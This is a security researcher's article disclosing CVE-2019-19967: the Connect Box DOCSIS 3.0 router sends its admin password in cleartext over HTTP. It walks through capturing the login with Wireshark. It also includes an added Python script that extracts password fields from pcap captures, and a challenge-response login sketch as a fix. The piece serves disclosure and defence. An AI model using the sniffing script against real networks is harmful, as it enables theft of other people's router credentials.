Router Exploiting

Filipi Pires
Published in CoreShield
Apr 4, 2020

Exploiting Connect Box EuroDOCSIS 3.0

Abstract

Routers are an integral part of today's home and small-office networks. These devices are usually deployed with their default configuration and are typically managed by people without any special technical knowledge. Often poorly configured and vulnerable, they are an easy target for network-based attacks and allow criminals to quickly and easily gain control over a whole network; the recent news about VPNFilter, the destructive malware that infected over half a million routers and could cut users off from the Internet, is a reminder of that. In this article we explain how we obtained the administrator credentials of the Connect Box DOCSIS 3.0 Voice Gateway router by sniffing HTTP packets on the same network: while testing, we found that the authentication process sends the password unencrypted, a weakness known as Cleartext Transmission of Sensitive Information. The router we tested is deployed in Poland by the internet service provider UPC, which provides services in several EU countries. The flaw is registered as CVE-2019-19967 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19967), and the National Vulnerability Database (NVD) assigned it a base score of 7.5, High (https://nvd.nist.gov/vuln/detail/CVE-2019-19967).

Keywords: Router Exploitation, Security, CyberSecurity.

Connect Box — UPC Router

The Connect Box is marketed as the world's most compact EuroDOCSIS 3.0 Voice Gateway, an all-in-one wired and wireless solution designed for the home, home office, or small business. It can serve households with one or more computers, which connect to the gateway over a wired or wireless link.

Source: google images

The purpose of this exercise is to validate the security of the router's standard configuration, and to check that the main security principles are applied, whether the device is used by a home user or in a corporate environment.

In this proof of concept we obtained the administrator credentials of the Connect Box DOCSIS 3.0 Voice Gateway router by sniffing HTTP packets on the same network as the router. While testing, we discovered that the authentication process of this router is affected by the vulnerability known as Cleartext Transmission of Sensitive Information.

After discovering this flaw we informed the manufacturer, which put us in contact with its development team to assist in the fix; we also registered the issue as CVE-2019-19967 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19967).

The router we tested is deployed in Poland by the internet service provider UPC, which provides services in several EU countries.

Understanding Authentication Process

The first step in this kind of assessment is to understand how the application handles authentication, including the responses that are "printed" on the login page.

Figure 1: created by owner (2020)

When we entered a guess ("admin") on the login page, we received the error shown in figure 1, but the text in the box was not masked as a password: as figure 2 shows, the input field of the form has type "text".

Figure 2: created by owner (2020)

A first recommendation is to use type="password" for this input, as shown in figure 3. However, that is only a visual protection: it tells us nothing about how the password is handled, or when and how authentication is performed. For that we need a network sniffer to see how the authentication request and its response look on the wire.

Figure 3: created by owner (2020)

Looking at the Network Communication

We used an attacker machine with IP address 192.168.0.45 to run Wireshark and capture all the traffic on the network, and a victim machine (Victim 1, 192.168.0.80) to log in to the router.

Figure 4: Victim Machine
created by owner (2020)
Figure 5: Attacker Machine
created by owner (2020)

Wireshark Analysis

We tried to log in with the password "admin" and, as before, the page printed "login incorrect". We then looked at how Wireshark recorded this authentication attempt. The intention was to find out what kind of encryption the application uses for authentication, but, to our surprise (figure 6), it uses none: the password crosses the network in clear text. This is the weakness MITRE catalogues as CWE-319, Cleartext Transmission of Sensitive Information (http://cwe.mitre.org/data/definitions/319.html).

Figure 6: created by owner (2020)

From here we only need to wait for a valid login. When the legitimate user enters the correct password, the administrator authentication is sent in clear text and can be read by anyone capturing traffic on the same network (figure 7).

Figure 7: created by owner (2020)

Another important point is that the attacker does not even need to be present at capture time. If the capture is saved as a pcap file and opened in Wireshark on another machine, as on the Windows machine in figure 8, the same clear-text authentication is visible in the file, without even the simplest protection.
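What Wireshark shows in figures 6 to 8 can be reproduced with a few dozen lines of code, which is the practical meaning of CWE-319: anyone on the path at capture time, or anyone holding the .pcap file afterwards, can read the credential. The script below is an added example, not code from the original article, and it handles both situations: it parses a classic libpcap file, walks Ethernet/IPv4/TCP, and extracts password-like fields from any form-encoded HTTP POST to port 80. The capture itself is constructed in memory; the gateway address 192.168.0.1, the /login path and the Username/Password field names are assumptions, since the article does not state what the Connect Box actually uses.

```python
"""Pull a cleartext HTTP form login out of a libpcap capture.

Added example, not from the original article. The capture is constructed in
memory; the router address, path and field names are assumptions.
"""
import struct
from urllib.parse import parse_qs

VICTIM_IP = "192.168.0.80"   # from the article
ROUTER_IP = "192.168.0.1"    # assumed; the article does not give the gateway address
PASSWORD_KEYS = ("pass", "pwd", "secret")


def _ip(addr):
    return bytes(int(o) for o in addr.split("."))


def build_pcap(http_payload, src=VICTIM_IP, dst=ROUTER_IP, dport=80):
    """Wrap one HTTP request in Ethernet/IPv4/TCP inside a classic libpcap file."""
    tcp = struct.pack("!HHIIBBHHH", 50000, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    ip_len = 20 + len(tcp) + len(http_payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, ip_len, 0x1234, 0, 64, 6, 0,
                     _ip(src), _ip(dst))            # checksums left 0; not verified below
    eth = b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00"  # constructed MACs, EtherType IPv4
    frame = eth + ip + tcp + http_payload
    global_hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # link type 1 = Ethernet
    record_hdr = struct.pack("<IIII", 0, 0, len(frame), len(frame))
    return global_hdr + record_hdr + frame


def iter_frames(pcap):
    """Yield each link-layer frame from a classic (non-pcapng) libpcap file."""
    magic, = struct.unpack_from("<I", pcap, 0)
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a libpcap file")
    link_type, = struct.unpack_from(endian + "I", pcap, 20)
    if link_type != 1:
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", pcap, off)
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def tcp_segment(frame):
    """Return (src_ip, dst_ip, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4
    src = ".".join(str(b) for b in frame[26:30])
    dst = ".".join(str(b) for b in frame[30:34])
    tcp_off = 14 + ihl
    dport, = struct.unpack_from("!H", frame, tcp_off + 2)
    data_off = (frame[tcp_off + 12] >> 4) * 4
    return src, dst, dport, frame[tcp_off + data_off:]


def parse_http_post(payload):
    """Split an HTTP POST into (path, headers, body); None for anything else."""
    if not payload.startswith(b"POST "):
        return None
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    _, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return path, headers, body


def find_cleartext_logins(pcap):
    """List (src, dst, path, field, value) for every password-like field sent in
    an unencrypted form-encoded POST to port 80: what a sniffer can read."""
    found = []
    for frame in iter_frames(pcap):
        seg = tcp_segment(frame)
        if seg is None or seg[2] != 80:
            continue
        src, dst, _, payload = seg
        req = parse_http_post(payload)
        if req is None:
            continue
        path, headers, body = req
        if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
            continue
        for field, values in parse_qs(body.decode("latin-1")).items():
            if any(k in field.lower() for k in PASSWORD_KEYS):
                found.append((src, dst, path, field, values[0]))
    return found


# Constructed sample: the "admin" guess from the article, sent as a form POST.
SAMPLE_BODY = b"Username=admin&Password=admin"
SAMPLE_REQUEST = (b"POST /login HTTP/1.1\r\nHost: 192.168.0.1\r\n"
                  b"Content-Type: application/x-www-form-urlencoded\r\n"
                  b"Content-Length: %d\r\n\r\n" % len(SAMPLE_BODY) + SAMPLE_BODY)
SAMPLE_PCAP = build_pcap(SAMPLE_REQUEST)

if __name__ == "__main__":
    for src, dst, path, field, value in find_cleartext_logins(SAMPLE_PCAP):
        print(f"{src} -> {dst} POST {path}: {field}={value}")
```

Two caveats a practitioner should keep in mind. First, the script assumes the whole POST sits in one TCP segment; a real capture may need TCP reassembly (Wireshark does this for you, this toy does not). Second, "capturing all the traffic on the network" is only automatic on a shared medium such as the same Wi-Fi network or a hub; on a switched LAN the attacker needs a mirror port or an on-path position such as ARP spoofing, which the article does not describe.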

Figure 8: created by owner (2020)

Conclusion

As this article shows, a simple cryptographic flaw in the web interface's authentication can severely compromise the security of a home user or of a company using this router. The weakness is the one where software transmits sensitive or security-critical data in clear text over a communication channel that an unauthorized actor can sniff, and it is registered as CVE-2019-19967 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19967).

There are several ways to raise the security level of a router's web interface: serve it over HTTPS so that the whole exchange is encrypted, or use an authentication scheme based on a server-issued token or challenge, so that the password itself is never sent over the network.
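To make the token-based alternative concrete, here is a small challenge-response login in which the router stores only a salt and a derived key, issues a one-shot nonce, and the client answers with an HMAC over that nonce. This is an added illustration of the recommendation above, not the vendor's fix and not something the Connect Box implements; the class and function names are mine. The `login` helper also returns exactly what an on-path sniffer would capture, so you can see that the password is absent from it.

```python
"""Challenge-response login in which the password never crosses the wire.

Added illustration of the token-based recommendation; not the vendor's fix.
"""
import hashlib
import hmac
import os
import secrets

PBKDF2_ROUNDS = 100_000


def derive_key(password, salt):
    """Slow down the offline guessing a sniffer can still attempt against a proof."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class RouterAuth:
    """Router side: stores salt and derived key only, and issues one-shot nonces."""

    def __init__(self, password):
        self.salt = os.urandom(16)
        self.key = derive_key(password, self.salt)
        self._pending = set()

    def challenge(self):
        nonce = secrets.token_bytes(16)
        self._pending.add(nonce)
        return self.salt, nonce

    def verify(self, nonce, proof):
        if nonce not in self._pending:   # never issued, or already consumed: a replay
            return False
        self._pending.discard(nonce)      # single use, whether or not the proof is right
        expected = hmac.new(self.key, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, proof)


def client_proof(password, salt, nonce):
    """Browser side: what the login page's script sends instead of the password."""
    return hmac.new(derive_key(password, salt), nonce, hashlib.sha256).digest()


def login(server, password):
    """Run one exchange; also return what an on-path sniffer would capture."""
    salt, nonce = server.challenge()
    proof = client_proof(password, salt, nonce)
    ok = server.verify(nonce, proof)
    on_the_wire = {"salt": salt.hex(), "nonce": nonce.hex(), "proof": proof.hex()}
    return ok, on_the_wire


if __name__ == "__main__":
    router = RouterAuth("correct horse battery staple")   # constructed sample password
    ok, wire = login(router, "correct horse battery staple")
    print("login ok:", ok)
    print("seen by a sniffer:", wire)
```

This removes the cleartext password and defeats replay, but it is not a substitute for HTTPS (RFC 2818): a sniffer can still try to guess a weak password offline against the captured salt, nonce and proof (PBKDF2 only slows that down), the session cookie issued after a successful login is as exposed as the password was, and an active attacker on the same network can replace the script that computes the proof unless the page is delivered over TLS.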

I recommend reading the HTTP RFCs listed in the references to understand how the protocol works and which protection mechanisms are available, in particular HTTP over TLS (RFC 2818).

References

CVE-2019-19967: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19967 (accessed 16/01/2020)
NVD entry for CVE-2019-19967: https://nvd.nist.gov/vuln/detail/CVE-2019-19967 (accessed 27/08/2020)
Proof-of-concept repository: https://github.com/filipi86/ConnectBoxDOCSIS-3.0 (accessed 16/01/2020)
RFC 2660, The Secure HyperText Transfer Protocol: https://tools.ietf.org/html/rfc2660 (accessed 16/01/2020)
RFC 7231, Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content: https://tools.ietf.org/html/rfc7231 (accessed 16/01/2020)
RFC 2818, HTTP Over TLS: https://tools.ietf.org/html/rfc2818 (accessed 16/01/2020)
RFC 2616, Hypertext Transfer Protocol, HTTP/1.1: https://tools.ietf.org/html/rfc2616 (accessed 16/01/2020)
CWE-319, Cleartext Transmission of Sensitive Information: http://cwe.mitre.org/data/definitions/319.html (accessed 27/01/2020)
Official document from UPC, Connect Box manual: https://www.upc.ch/pdf/support/manuals/en/internet/ConnectBox/connect-box-manual.pdf (accessed 16/01/2020)

Filipi Pires
CoreShield

Security Researcher; Founder and Technical Trainer of the course Malware Analysis Fundamentals